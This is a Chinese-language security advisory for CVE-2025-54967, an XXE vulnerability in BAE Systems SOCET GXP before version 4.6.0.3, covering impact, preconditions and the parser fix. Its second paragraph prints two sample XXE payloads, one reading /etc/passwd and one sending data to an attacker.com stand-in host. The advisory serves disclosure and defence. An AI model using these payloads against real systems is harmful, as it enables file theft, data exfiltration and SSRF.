CVE-2025-54967CVE-2025-54967是BAE Systems SOCET GXP地理空间开发产品中的一个中等严重性安全漏洞。该漏洞存在于4.6.0.3之前的版本中,根源在于软件在处理XML文件时未能正确禁用XML外部实体(XXE)功能。XXE是一种针对XML解析器的攻击技术,攻击者通过在XML文档中插入恶意的外部实体引用,可以迫使解析器读取本地文件、执行远程请求或泄露敏感信息。在SOCET GXP的应用场景中,攻击者可以精心构造一个包含恶意XXEpayload的XML文件,当用户打开该文件时,解析器会尝试加载攻击者指定的外部资源,可能导致敏感系统文件被读取、敏感数据外泄或触发服务端请求伪造(SSRF)攻击。由于该漏洞需要用户交互(诱使用户打开恶意文件),因此攻击门槛相对较高,但仍对使用该软件的组织和个人构成安全风险。建议受影响的用户尽快升级到4.6.0.3或更高版本以消除该安全风险。
该漏洞属于XML外部实体注入(XXE)漏洞。在SOCET GXP处理XML文件时,XML解析器配置不当,允许加载外部实体。攻击者可以构造包含如下payload的恶意XML文件:<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>,当SOCET GXP用户打开该文件时,解析器会尝试读取系统文件/etc/passwd并将其内容嵌入到XML响应中。另一种利用方式是通过外部实体触发HTTP请求,如<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/steal?data=xxx">]><root>&xxe;</root>,这可能导致敏感数据外泄或SSRF攻击。攻击成功的关键在于:1)攻击者需要通过社会工程学手段诱骗用户打开恶意XML文件;2)目标系统运行SOCET GXP且版本低于4.6.0.3;3)攻击者需要了解目标环境的文件结构或系统架构以构造有效的payload。修复方案是在XML解析器配置中明确禁用外部实体加载、DTD(文档类型定义)解析和外部参数实体。